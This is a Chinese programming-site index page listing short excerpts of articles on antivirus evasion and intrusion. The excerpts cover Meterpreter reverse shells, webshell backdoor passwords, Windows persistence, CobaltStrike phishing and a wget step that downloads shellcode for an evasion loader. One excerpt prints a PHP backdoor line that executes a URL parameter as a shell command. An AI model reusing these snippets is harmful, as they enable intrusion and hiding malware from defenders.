E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
免杀_花指令
黑客入侵日记: Meterpreter
免杀
内网渗透第二章
黑客入侵日记:Meterpreter
免杀
内网渗透第二章请点击此处输入图片描述这里再介绍一种,生成反弹shell的方式。就是直接以raw的形式保存成文件只要目标进行了访问,就会反弹回shell。
花无涯
·
2019-10-31 15:51
各类黑客大马默认密码后门
各类黑客大马默认密码后门通过goolehack语法搜索incontent:xx黑客留的后门黑羽基地
免杀
asp大马密码5201314HackedByCHINA!
良辰#
·
2019-10-22 11:00
windows中常见后门持久化方法总结
前言当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法后门持久化我的操作环境是:无AV、管理员权限(提权、
免杀
等是后门持久化的铺垫
一又、、
·
2019-10-20 22:00
payload
免杀
之Installutil.exe&csc.exe利用
0x00前言C#的在Windows平台下的编译器名称是Csc.exe。Installutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等。这两个东西一般情况下是配合使用。所以就不单独拿出来讲了。0x01利用过程1.下载shellcode.cswgethttps://github.com/222222amor/ex
轻落语
·
2019-09-30 13:00
解决易语言空壳程序360误报
2.加入启动窗口创建完毕和启动窗口将被销毁,被主动防御杀3.去掉勾选配置中写入版本信息,直接生成,
免杀
4.加入启动窗口创建完毕和启动窗口将被销毁,去掉勾选配置中写入版本信息,直接生成,
免杀
5.直接生成,
·
2019-09-24 18:55
Android 实现代码混淆的实例
Android实现代码混淆的实例1、简介代码混淆(Obfuscatedcode)亦称
花指令
,是将计算机程序的代码,转换成一种功能上等价,但是难于阅读和理解的形式的行为。
·
2019-09-24 14:30
教你识别简单的免查杀PHP后门
一个最常见的一句话后门可能写作这样或这样tudouya同学在FREEBUF上给出[一种构造技巧]利用复制代码代码如下:构造生成,当然,嫌太直观可以写作这样复制代码代码如下:然后再填充些普通代码进行伪装,一个简单的”
免杀
·
2019-09-23 23:41
payload
免杀
之msbuild利用
0x00前言红队必备技巧
免杀
之一,现在主要是.net4.0下实现。待我过几天有空实现一下.net2.0。
轻落语
·
2019-09-19 22:00
php异或计算绕过preg_match()
原理以制作
免杀
马为例:在制作
免杀
马的过程,根据php的语言特性对字符进行!
Hanamizuki花水木
·
2019-09-18 23:00
提权学习:第三方软件提权(巴西烤肉提权和启动项提权)
当你的才华还撑不起你的野心时那你就应该静下心来学习目录巴西烤肉提权启动项提权0x01启动项提权0x02启动项提权,拓展知识【写入启动项提权/启动项里提权】巴西烤肉提权首先,基本提权前看一下,wscript组建是否支持,如果支持的话,那我们可以传一个cmd.exe,我传了一个
免杀
的
Causal_Escap
·
2019-08-20 02:50
渗透测试
提权学习
后渗透篇
CobaltStrike视频教程
:介绍与安装介绍与安装第二章:payload应用创建监听及生成payloadoffice宏payload应用httpspayload应用搜集目标基本信息网页挂马应用钓鱼页面应用批量发送钓鱼邮件第三章:
免杀
应用使用
wx5d4987290eb2c
·
2019-08-06 22:42
cobaltstrike
cs
CobaltStrike 应用教程
:介绍与安装介绍与安装第二章:payload应用创建监听及生成payloadoffice宏payload应用httpspayload应用搜集目标基本信息网页挂马应用钓鱼页面应用批量发送钓鱼邮件第三章:
免杀
应用使用
发哥微课堂
·
2019-07-29 22:09
CobaltStrike
[原创]Python
免杀
ShellCode加载器(Cobaltstrike/Metasploit)
方法较LOW但
免杀
。本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。PS:何为SC加载器,即专门用于加载所提供ShellCode的工具。
K8哥哥
·
2019-07-21 23:00
各类黑客大马默认密码后门
通过goolehack语法搜索incontent:xx黑客留的后门黑羽基地
免杀
asp大马密码5201314HackedByCHINA!
痱子﹑
·
2019-07-09 15:00
免杀
fpipe端口转发
forwardpipe是一个端口重定向工具,就是可以实现从Internet到局域网内部机器的特定端口服务的访问,简单从字面意思来理解即转发通过管道,也就是所谓的端口重定向,通过一个管道,把一端端口流量丢给管道的另一端端口。基础准备:本机win10,IP:192.168.0.2可以与虚拟机win10通信,不能与虚拟机win12通信虚拟机win12IP:192.168.5.167假设是内网中不能出网的
丶ershiyi
·
2019-06-28 18:39
网络安全
端口转发
流量转发
渗透工具
php中转菜刀脚本过狗
免杀
$V){if(strstr($v,"base64_decode")){$v=str_replace("base64_decode(","",$v);$v=str_replace("))",")",$v);}else{if($k==="z0"){$v=base64_decode($v);}}$pp=$k."=".urlencode($v);if($i!=0){$post=$post."&".$pp;
痱子﹑
·
2019-06-16 19:00
一句话木马(最新
免杀
php后门一句话)
啊哈哈这段代码可以被利用做后门暂时
免杀
。代码:<?php//t.php$test=$_GET['r'];echo`$test`;?>大家看看这个代码有木有问题?
Coisini、
·
2019-06-15 17:24
一句话木马
小马
PHP免杀后门
安全开发
逆向漏洞
实战篇
从后渗透分析应急响应的那些事儿(二)
免杀
初识篇
从后渗透分析应急响应的那些事儿(二)
免杀
初识篇文章首发于freebufTidesec专栏https://www.freebuf.com/column/204005.html,转载到个人博客记录,转载请注明出处
上卿
·
2019-06-06 15:29
Virbox Compiler -安全编译器——实现源代码编译过程的加密
加密后程序不会报毒,可实现
免杀
。这是一款源代码加密产品,支持全平台全架构,可以用于保护传统软件、移动端软件、智能设备软件、IoT软件等的源代码。
辉这样说
·
2019-06-06 13:33
安全笔记:渗透|Metasploit的MSF终端——基础使用(未完全修改)
目录基础使用指南接口功能程序基础功能载荷配置攻击方式msfvenom附属功能数据库nexposenessus自建脚本常用模块介绍情报搜集——扫描模块渗透攻击后渗透攻击(Meterpreter)
免杀
技术相关知识基础使用指南情报搜集
-Mr.Chen-
·
2019-05-19 17:14
安全笔记:渗透
2019-05-12强化学习
1.普通恶意软件攻击--------------->普通恶意软件检测模型-————>使用强化学习技术对恶意软件进行升级以此来
免杀
—————>使用升级版的软件再次来训练恶意软件检测模型2.XSS脚本攻击-
持戒行善
·
2019-05-12 11:59
vc++中输入表的
免杀
vc++中输入表的
免杀
国外的杀毒软件一般会把特征码定位在PE文件的输入表函数(也就是源码里我们调用了的API函数)上,我们对付这种查杀的方法就是在源码里对API函数进行动态调用,对一个函数动态调用之后,
清心_3389
·
2019-05-04 20:00
Web渗透
木马免杀
190321 逆向-
花指令
去除(脚本)
Pizza的脚本中是通过get_bytes和patch_bytes两个API来将所有机器码读出然后再Patch回去的中间匹配pattern的过程是构造字符串然后find来控制这样操作的优点是find的效率奇高,对于大量数据的处理非常的快而我们之前使用的逐字符匹配pattern的优点是可控性比较强,例如通配符的存在然而缺点就是速度很慢,对于数量级较大时格外明显,因此试图修复刚开始以为速度在于多次取B
奈沙夜影
·
2019-03-22 02:22
CTF
190319 逆向-
花指令
以前也接触过简单的
花指令
,基本上就是jz/jnz式的固定跳转前几天的某比赛中出现了一个相对而言比较复杂的
花指令
,参考pizza的笔记开始一阵学习XD前言
花指令
指的是没有卵用,会干扰代码阅读甚至反编译,却不影响程序功能的代码
奈沙夜影
·
2019-03-20 00:53
CTF
CrackMe
逆向和保护
【
免杀
】————3、Excel 和 Metasploit 和
免杀
这篇文章主要介绍以Excel文件为载体,生成meterpreter反向shell的不同方法。简介这篇文章会继续讨论反向shell和规避杀毒软件的方法。有兴趣的可以看我的前一篇文章。随着时间飞逝,以前一些很好的绕过杀毒软件的方法现在均已失效。所以,我必须找到一种新的方法来隐藏我的反向shell。让我们开始吧………古老而简单的方法可能是最好的…通过SMB_Deliver开启一个meterpreter的
FLy_鹏程万里
·
2019-03-07 09:40
【渗透测试高级篇】
———免杀
【
免杀
】————1、PHP一句话过狗、卫士、D盾等
免杀
思路
总结:这种方法虽然简单,但是却没有太强的
免杀
功效,需要结合其他方法。00x2.可变变量、引用、可变函数。
FLy_鹏程万里
·
2019-03-04 15:42
【渗透测试高级篇】
———免杀
纪念一位母亲(古风)
答谢亲友结善缘,避
免杀
戮战争因。心无挂碍菩萨行,发行无上菩提心。图片发自App03、娑婆引业不再欠,遗嘱拒收亲友钱,香积世界请素宴,宇宙祥和国泰安。国家资源莫多占,愿海寺塔永修禅。意不颠倒不贪恋,一句
真如自在
·
2019-02-22 02:26
iOS开发-代码混淆
代码混淆代码混淆(Obfuscatedcode)亦称
花指令
,是将计算机程序的代码,转换成一种功能上等价,但是难于阅读和理解的形式的行为。将代码中的各种元素,如变量,函数,类的名字改写成无意义的名字。
才华惊动警方
·
2019-01-31 11:37
基于AS的代码混淆配置
什么是代码混淆代码混淆(Obfuscatedcode)亦称
花指令
,是将计算机程序的代码,转换成一种功能上等价,但是难于阅读和理解的形式的行为。
小风风吖
·
2018-12-29 10:53
windows下
免杀
后门测试
今天突发奇想整理测试下win下的
免杀
后门先占个坑,以后有时间慢慢写anti-virus测试网站www.virustotal.com先测的是msf下的单编码捆绑大小基本未变msfvenom-pwindows
GUINEW
·
2018-12-10 17:22
渗透测试
lcx.exe内网转发命令教程 + LCX
免杀
下载
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84625404本机:lcx-listen222233332222为转发端口,3333为本机任意未被占用的端口肉鸡:lcx-slave192.168.109.1372222127.0.0.13389192.168.109.137为本机IP,2222为转发端口,127.0.0.1为肉鸡
冰 河
·
2018-11-29 12:27
渗透
Meterpreter技术原理:载荷执行
关于Meterpreter的使用方法、
免杀
技巧等网上已经有很多教程,本文以32位reverse_tcppayload为例,结合源码,分析梳理Meterpreter载荷执行流程和原理。
看雪学院
·
2018-11-09 18:10
Pyinstaller生成exe文件
免杀
0x01解决方案之前用python打包的exe文件总会被电脑关键识别成木马文件隔离,很困扰(虽说本来也不是做什么好事==)解决方案:再生成exe文件时给生成的exe加上图标即可。使用命令:pyinstaller-ixxxx.ico-w-Fxxxx.py0x02ico文件生成代码pyinstaller需要特定的后缀为.ico的图片文件来生成图标,且对文件的大小尺寸有要求。经过查询,以下方法可以顺利生
Clannad_niu
·
2018-11-07 11:36
Metasploit(msf)系列-木马
免杀
木马文件风险高,想要
免杀
需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。
WAHK
·
2018-10-10 09:25
msf系列
PE文件学习笔记(一)---导入导出表
最近在看《黑卡
免杀
攻防》,对讲解的PE文件导入表、导出表的作用与原理有了更深刻的理解,特此记录。首先,要知道什么是导入表?
还木人
·
2018-10-07 14:35
新操作
安全
免杀
所有杀软的端口转发工具
平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。常见的端口转发lcx.exenc.exeUsingphp/jsp/aspxScriptiptables端口转发nginx端口转发等等……其中lcx.exe、nc.exe以及使用脚本转发,都有可能被防护/杀毒软件拦截,而后者则略微有点麻烦(不会告诉你是因为我真懒!)我是一个非常喜欢渗透测试的人,并且颜值比较高(啊,打
大方子
·
2018-09-27 22:07
工具分享
小白pe制作
PS:使用前先关闭杀毒软件,避
免杀
毒软件阻拦操作步骤。1.打开下载好的小白,点击【U盘启动】,然后点击【U盘模式】,进入界
missile111
·
2018-09-15 23:47
工具制作
市井深处显人生
豆瓣评分9.0,b站评分9.8的美食纪录片神作,怎么可以吃兔兔党一定不要看,以
免杀
猪宰羊活切龙虾等画面引起不适,像我这种吃货对那些画面是可以自动屏蔽的,生而为人,对待食物链中的生物没有办法不残忍。
东方大熊猫
·
2018-08-25 22:58
Kali的学习笔记篇(八)使用msf生成的shellcode制作
免杀
payload
环境:kali-linux-2018.2-amd.isoVisualStudio2017msfvenom更新时间:2018年8月13日07:06:43直接注入的生成方式(一)://生成c格式的后门,-p指定模块,-e指定编码,-i指定编码次数,-f输出格式,-b去除指定代码root@kali:~#msfvenom-pwindows/meterpreter/reverse_tcp-ex86/shik
红衣学姐
·
2018-08-13 03:10
kali
卡莉咖喱
加密壳
文章目录加密壳功能功能截图主程序:加壳后程序截图:项目设计项目经验核心功能IAT加密End加密壳控制台界面;exe程序加壳;功能代码加密;重定位;IAT加密;软件授权;TLS模拟执行;
花指令
;混淆;反调试
D_K_01
·
2018-06-25 20:04
My-C++
免杀
原理与实践
MarkdownPadDocument
免杀
原理与实践1.基础问题(1)杀软是如何检测出恶意代码的?1:基于特征码一段特征码就是一段或多段数据。
曹贻森
·
2018-05-27 20:00
网络攻防技术作业
实践要求(1)理解
免杀
技术原理(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等
免杀
工具或技巧;(成功实现了
免杀
的。如何做成功的简单语言描述即可,不要截图、指令。
zero_to_one
·
2018-05-27 20:00
2017-2018-2 20179225 《网络攻防与实践》 第12周作业
实践内容(1)理解
免杀
技术原理(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等
免杀
工具或技巧;(成功实现了
免杀
的。如何做成功的简单语言描述即可,不要截图、指令。
9225王孟亚
·
2018-05-27 18:00
2017-2018-2 20179204《网络攻防实践》第十二周学习总结
免杀
技术
第1节实践内容1.理解
免杀
技术原理2.正确使用msf编码器,veil-evasion,自己利用shellcode编程等
免杀
工具或技巧;(成功实现了
免杀
的。如何做成功的简单语言描述即可,不要截图、指令。
20179204葛鸽
·
2018-05-27 12:00
免杀
技术
一、基础知识1.杀软是如何检测出恶意代码的?(1)检测特征码人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。(2)启发式恶意软件检测如果该程序的特征和行为与病毒程序类似,其匹配程度达到一定值就可以认为该程序是病毒程序。(3)基于行为检测与启发式检测类似,只是单纯依靠监测程序行为来作为标准。通过监视恶意代码运行过程,如
20179202杨晓桐
·
2018-05-27 10:00
对msf生成的攻击载荷进行
免杀
处理
使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器
Solarzhou
·
2018-04-30 13:58
与安全相关
180420 逆向-DDCTF_WP(Re)
打开发现几个字符串结构都很清晰,提供16个变量,然后进行16次方程校验但是运行会发现在中间就因为段错误而异常尝试许久以后发现几个不太对劲的指令,突兀出现的t,t,sp,跳转等等的机器码都为EB02开头,猜测为
花指令
奈沙夜影
·
2018-04-21 20:42
CTF
Metaploit木马制作(无
免杀
毒)
系统:kali,ip:192.168.43.16所有需要输入的命令均在查看自己的ip使用命令生成木马程序ks.exe>windows/meterpreter/reverse_tcp(利用windows/meterpreter/reverse_tcp漏洞)-ex86/shikata_ga_nai(靶机win10是64位,所以应选择对应的编码格式否则,可执行文件再次打开时会出现错误)-i5(代表编码次
TK13的舔狗
·
2018-04-14 15:42
kali工具利用
2017-2018-2 20155303 『网络对抗技术』Exp3:
免杀
原理与实践
2017-2018-220155303『网络对抗技术』Exp3:
免杀
原理与实践————————CONTENTS————————1.
免杀
原理与实践说明实验说明基础问题回答2.使用msf编码器生成后门程序及检测
0x14b7狄
·
2018-04-10 00:00
免杀
原理与实践
免杀
原理
免杀
就是躲杀软的识别,那就从杀软的原理下手。1.改变特征码如果你手里只有EXE,加壳
郭溢才
·
2018-04-08 00:00
上一页
16
17
18
19
20
21
22
23
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他